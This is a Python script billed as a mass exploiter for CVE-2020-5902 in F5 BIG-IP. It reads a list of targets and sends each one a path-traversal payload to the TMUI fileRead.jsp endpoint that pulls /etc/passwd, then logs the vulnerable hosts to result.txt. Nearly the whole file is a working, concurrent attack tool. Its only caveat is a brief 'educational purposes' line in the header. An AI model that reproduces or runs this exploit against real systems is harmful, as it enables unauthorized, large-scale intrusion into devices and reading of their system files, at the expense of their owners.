CVE-2020-5902-mass-exploiter.py

import argparse
import aiohttp
import asyncio
from termcolor import colored

'''
Coded by d4rkstat1c..
CVE-2020-5902-mass-exploiter.
Use for educational purposes.
Shoutz to s1ege, neckros, anonxoxtn, 3turr.
usage: mass.py -l list.txt -w <workers amount>
'''

async def work(session, target):
    payload = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    try:
        async with session.get(target+payload, timeout=10) as r:
            if r.status == 200:
                f = open('result.txt', 'a')
                if 'root:x:0:0:root' in await r.text():
                    print(colored('[+] {0} is VULNERABLE!!!\n'.format(target), 'green'))
                    result = ' <- VULNERABLE'
                else:
                    print(colored('[+] {0} may be vulnerable, check manually!\n'.format(target), 'yellow'))
                    result = ' <- POSSIBLY VULNERABLE'
                f.write(target+result+'\n')
                f.close()
            else:
                print(colored('[-] {0} Exploit failed.\n'.format(target), 'red'))
    except:
        print(colored('[-] {0} Network/Connection Error.'.format(target), 'blue'))

async def create_workers(targets):
    async with aiohttp.TCPConnector(ssl=False) as connector:
        async with aiohttp.ClientSession(connector=connector) as session:
            await asyncio.gather(*[work(session, target.strip()) for target in targets])

def read_file(filename):
    with open(filename, "r") as f:
        return f.readlines()

def main():
    parser = argparse.ArgumentParser(description='F5 Big-IP CVE-2020-5902 mass exploiter')
    parser.add_argument('-l', '--list', type=str, required=True,
                        help='Specify the list of targets.')
    parser.add_argument('-w', '--workers', type=str, required=True,
                        help='Specify the max amount of workers.')

    args = parser.parse_args()
    targets = read_file(args.list)
    
    max_workers = int(args.workers)
    list_len = len(targets)

    if max_workers >= list_len:
        asyncio.get_event_loop().run_until_complete(create_workers(targets))
    else:
        for i in range(0, list_len, max_workers):
            target_chunk = targets[i:i+max_workers]
            asyncio.get_event_loop().run_until_complete(create_workers(target_chunk))

if __name__ == '__main__':
    main()